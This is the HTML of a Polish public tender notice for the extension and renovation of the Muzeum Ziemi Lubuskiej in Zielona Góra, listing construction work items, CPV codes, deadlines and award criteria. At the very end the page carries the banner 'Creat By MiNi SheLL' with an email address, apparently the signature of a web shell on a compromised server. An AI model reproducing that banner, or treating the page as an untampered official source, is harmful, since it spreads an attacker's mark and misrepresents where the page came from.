id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">zmiana Wykonawcy realizacji zamówienia publicznego w przypadku gdy wykonawca z którym została zawarta umowa wykaże i wyjaśni, że nie jest w stanie zrealizować zamówienia zgodnie z umową. Umowa może być wtedy zawarta z innym wykonawcą na tych samych warunkach. Nowy wykonawca musi wykazać spełnienie warunków udziału w postępowaniu oraz kryteriów oceny ofert określonych w ogłoszeniu o zamówieniu lub SIWZ w zakresie nie mniejszym niż dotychczasowy wykonawca. Nowy wykonawca musi także wykazać brak podstaw do wykluczenia w zakresie określonym w ogłoszeniu o zamówieniu lub w SIWZ. Nowy wykonawca zawiera umowę na tych samych warunkach. Nowy wykonawca odpowiada solidarnie z dotychczasowym wykonawcą za zakres umowy dotychczas zrealizowany.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-07-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Rozbudowa Muzeum Ziemi Lubuskiej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem inwestycji jest rozbudowa budynku Muzeum Ziemi Lubuskiej w Zielonej Górze wraz z zagospodarowaniem terenu. Zakres robót obejmuje:1.1	Roboty rozbiórkowe 1.1.1	Rozbiórka budynku garażowego wraz z przybudówką 1.1.2	Rozbiórka nawierzchni drogowych i chodników 1.1.3	Wycinka drzew + mechaniczne karczowanie pni 1.1.4	Rozbiórka obróbek blacharskich 1.1.5	Rozbiórka stolarki okiennej i drzwiowej 1.1.6	Rozbiórka posadzek 1.1.7	Utylizacja gruzu i materiałów z rozbiórki1.2	Roboty ziemne 1.2.1	Wykonanie wykopu pod fundamenty1.3	Stan zerowy1.3.1	Podkład betonowy gr. 10cm 1.3.2	Izolacja płyt betonowych matą 1.3.3	Wykonanie płyt fundamentowych żelbetowych1.3.4	Wykonanie izolacji pionowej zewn. ścian fundamentowych matą1.3.5	Wykonanie ścian żelbetowych grubości 25cm1.3.6	Wykonanie ścian żelbetowych grubości 20cm1.3.7	Wykonanie ścian oporowych 1.3.8	Wykonanie słupów żelbetowych1.3.9	Nadproża, podciągi żelbetowe1.3.10	Schody żelbetowe 1.3.11	Strop żelbetowy Filigran1.3.12	Izolacja pionowa i pozioma ścian żelbetowych1.4	Ściany murowane1.4.1	Ściany parter1.4.2	Ściany I piętro1.4.3	Ściany II piętro1.4.4	Kanały wentylacyjne1.5	Konstrukcje żelbetowe1.5.1	Ściany i słupy żelbetowe parter1.5.2	Ściany i słupy żelbetowe I piętro1.5.3	Ściany i słupy żelbetowe II piętro1.5.4	Nadproża, podciągi, wylewki żelbetowe1.5.5	Schody żelbetowe1.5.6	Strop żelbetowy Filigran1.5.7	Strop z płyt kanałowych1.5.8	Szyb windowy1.5.9	Wieńce wraz ze zbrojeniem1.6	Dach1.6.1	Paroizolacja z folii 1.6.2	Izolacja pozioma z płyt z wełny mineralnej1.6.3	Pokrycie dachu 2x papą termozgrzewalną1.6.4	Świetlik dachowy, wyłaz kominowy1.6.5	Obróbki blacharskie 1.6.6	Rynny i rury spustowe1.7	Okładziny wewnętrzne 1.7.1	Tynki gipsowe piwnica 1.7.2	Tynki gipsowe i akustyczne parter 1.7.3	Tynki gipsowe i akustyczne I piętro 1.7.4	Tynki gipsowe i akustyczne II piętro 1.7.5	Tynki akustyczne sufitów 1.7.6	Listwy dylatacyjne 1.7.7	Ścianki z płyt GK (konstrukcja, wypełnienie z wełny min., obustronnie 2x płyta GK) - piwnica 1.7.8	Ścianki z płyt GK (konstrukcja, wypełnienie z wełny min., obustronnie 2x płyta GK) - parter 1.7.9	Ścianki z płyt GK (konstrukcja, wypełnienie z wełny min., obustronnie 2x płyta GK) - I p. 1.7.10	Sufity podwieszane 1.7.11	Malowanie ścian piwnica 1.7.12	Malowanie ścian parter 1.7.13	Malowanie ścian I piętro 1.7.14	Malowanie ścian II piętro 1.7.15	Płytki ścienne piwnica 1.7.16	Płytki ścienne parter 1.7.17	Płytki ścienne I piętro 1.7.18	Płytki ścienne II piętro1.8	Podłoża i posadzki 1.8.1	Izolacja pozioma podposadzkowa z płyt styropianowych 1.8.2	Warstwa wyrównawcza betonowa ze zbrojeniem 1.8.3	Posadzka z wykładziny podłogowej 1.8.4	Posadzka z wykładziny dywanowej 1.8.5	Listwy przyścienne 1.8.6	Posadzki z płytek Gres piwnica 1.8.7	posadzki z płytek Gres parter 1.8.8	posadzki z płytek gres I piętro 1.8.9	Posadzki z płytek gres II piętro 1.8.10	Stopnice i podstopnice z granitu polerowanego 1.8.11	Posadzki z granitu polerowanego piwnica 1.8.12	Posadzki z granitu polerowanego parter 1.8.13	Posadzki z granitu polerowanego I piętro 1.8.14	Posadzki z granitu polerowanego II piętro 1.8.15	Wykonanie sceny (konstrukcja drewniana -podłoga podniesiona, schody) 1.8.16	Wykonanie sceny - ułożenie parkietu 1.8.17	Posadzki epoksydowe - piwnica 1.8.18	Wycieraczka szczotkowa aluminiowa1.9	Stolarka okienna i drzwiowa 1.9.1	Poziom: Piwnica 1.9.1.1	Okna 1.9.1.2	Drzwi wewnętrzne 1.9.2	Ścianki systemowe w pom. sanitarnych 1.9.3	Poziom Parter 1.9.3.1	Okna 1.9.3.2	Drzwi wewnętrzne 1.9.4	Poziom I piętro 1.9.4.1	Okna 1.9.4.2	Drzwi wewnętrzne 1.9.5	Poziom II piętro 1.9.5.1	Okna 1.9.5.2	Drzwi wewnętrzne 1.9.5.3	Drzwi zewnętrzne aluminowe 1.9.6	Brama wjazdowa garażowa 1.9.7	Brama wewnętrzna pożarowa 1.10	Elementy ślusarskie 1.10.1	Balustrady wewnętrzne 1.10.2	Balustrady zewnętrzne 1.10.3	Drabiny 1.10.4	Wycieraczki stalowe 1.11	Elewacja 1.11.1	Elewacja z okładziny kamiennej 1.11.2	Ocieplenie ścian 1.11.3	Wyprawa elewacyjna z tynku akrylowego 1.11.4	Daszek 1.11.5	Napis z liter z tworzywa sztucznego 1.11.6	Żaluzje zewnętrzne 1.11.7	Malowanie farbą murów oporowych 1.11.8	Wykonanie opaski ze żwiru płukanego wokół budynku wraz z montażem obrzeży betonowych 1.12	Wyposażenie 1.12.1	Wyposażenie łazienek 1.12.2	Gaśnice 1.12.3	Krzesła w Sali konferencyjnej 1.12.4	Kurtyna sceniczna 1.12.5	Projektor multimedialny 1.12.6	Osłony na okna w salach wystawowych 1.13	Dźwig 1.14	Roboty budowlane w bud. istniejącym 1.14.1	Wykucie otworów drzwiowych 1.14.2	Montaż belek stalowych 1.14.3	Zamurowanie i tynkowanie bruzd 1.15	Przyłącza 1.15.1	Przyłącze energetyczne z trafostacją 1.15.2	Przyłącze do węzła cieplnego 1.16	Instalacje sanitarne 1.16.1	Instalacja wentylacji i klimatyzacji 1.16.1.1	Wentylacja 1.16.1.2	Klimatyzacja 1.16.2	Instalacje centralnego ogrzewania 1.16.2.1	Instalacje centralnego ogrzewania grzejnikowe 1.16.2.2	Instalacja zasilania nagrzewnic 1.16.3	Instalacje wodno-kanalizacyjne 1.16.3.1	Instalacje wodociągowe 1.16.3.2	Instalacje kanalizacyjne 1.16.3.3	Instalacje wody p.poż. 1.16.3.4	Odwodnienia zewnętrzne (garaż, dach, drenaż) 1.17	Instalacje elektryczne i teletechniczne 1.17.1	Rozdzielnie elektryczne i WLZ 1.17.2	Instalacje oświetleniowe+system sterowania 1.17.3	Instalacje gniazd wtykowych 1.17.4	Instalacje SAP 1.17.5	System oddymiania klatki schodowej 1.17.6	Instalacje nagłośnienia 1.17.7	Instalacje teleinformatyczne 1.17.8	Instalacje CCTV 1.17.9	Instaklacje przyzywowe dla osób niepełnosprawnych 1.17.10	Instalacje SWiN 1.17.11	Instalacje odgromowe i uziemiająca 1.17.12	Sieci i oświetlenie zewnętrzne 1.17.13	Pomiary elektryczne 1.18	Zagospodarowanie terenu 1.18.1	Droga manewrowa, chodniki, st.postojowe 1.18.2	Tereny zielone 1.18.3	Mała architekturaZamawiający ustala gwarancję jakości wszystkich prac na 36 miesięcy.Zamawiający ustala podstawowy wymiar gwarancji jakości wykonania pokrycia dachowego i konstrukcji dachu na 36 miesięcy.Szczegółowy zakres przedmiotu zamówienia określony został w Projekcie budowlanym, Projekcie wykonawczym, Specyfikacji Technicznej Wykonania i Odbioru Robót, Decyzji Miejskiego Konserwatora Zabytków z dnia 13 marca 2017 roku stanowiących załączniki do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45212313-3, 45111000-8, 45223500-1, 45262500-6, 45261210-9, 45421000-4, 45430000-0, 45440000-3, 45233120-6, 45342000-6, 45112710-5, 45331210-1, 45332000-3, 45331100-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja pokrycia dachowego i konstrukcji</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie personelu kluczowego </td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Remont zabytkowego budynku Muzeum Ziemi Lubuskiej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest remont istniejącego budynku Muzeum Ziemi Lubuskiej w Zielonej Górze:Zakres robót obejmuje:2.1	Roboty rozbiórkowe 2.2	Izolacja ścian piwnic 2.3	Uzupełnienie scian z cegły 2.4	Obudowy ogniowe belek stalowych dachu 2.5	Roboty wykończeniowe 2.5.1	Ścianki z płyt GK 2.5.2	Płytki ceramiczne ścienne 2.5.3	Malowanie ścian (wraz z przygotowaniem podłoża) 2.5.4	Gładź gipsowa 2.5.4.1	Gładź gipsowa na sufitach - piwnica 2.5.4.2	Gładź gipsowa na sufitach - parter 2.5.4.3	Gładź gipsowa na sufitach - I piętro 2.5.4.4	Gładź gipsowa na sufitach - II piętro 2.5.4.5	Gładź gipsowa na ścianach - piwnica 2.5.4.6	Gładź gipsowa na ścianach - parter 2.5.4.7	Gładź gipsowa na ścianach - I piętro 2.5.4.8	Gładź gipsowa na ścianach - II piętro 2.6	Warstwy wyrównujące pod wykonanie posadzki z wykładziny dywanowej 2.7	Wyłożenie wykładziny dywanowej 2.8	Posadzki z płytek Gres 2.9	Posadzki z granitu polerowanego 2.10	Stolarka drzwiowa 2.10.1	Stolarka drzwiowa wewnętrzna PCV 2.10.2	Stolarka drzwiowa wewnętrzna drewniana 2.10.3	Stolarka drzwiowa wewnętrzna metalowa w okleinie 2.11	Instalacja wod-kan remontowanej łazienki 2.11.1	Instalacja wodno-kanalizacyjna 2.11.2	Biały montaż 2.12	Instalacja centralnego ogrzewania 2.12.1	Roboty budowlane (wykucia, zamurowanie otworów, wywóz gruzu) 2.12.2	Demontaż grzejników i starej instalacji 2.12.3	Wykonanie nowej instalacji c.o. 2.12.4	Montaż grzejników, próby szczelności 2.13	Instalacje elektryczne i teletechniczne 2.13.1	Instalacje elektr. w Sali belkowej 2.13.2	Instalacje SAP 2.13.3	Instalacje CCTV 2.13.4	Instalacje przyzywowe w toaletach dla niepełnosprawnych 2.13.5	Instalacje SWiNZamawiający ustala podstawowy wymiar gwarancji jakości na 36 miesięcy.Szczegółowy zakres przedmiotu zamówienia określony został w Projekcie budowlanym, Specyfikacji Technicznej Wykonania i Odbioru Robót, Decyzji Miejskiego Konserwatora Zabytków z dnia 30 marca 2017 stanowiących załączniki do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45111300-1, 45112000-5, 45262500-6, 45320000-6, 45410000-4, 45421131-1, 45430000-0, 45442100-8, 45453000-7, 45331100-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja dodatkowa wykonanych prac</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie personelu kluczowego </td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com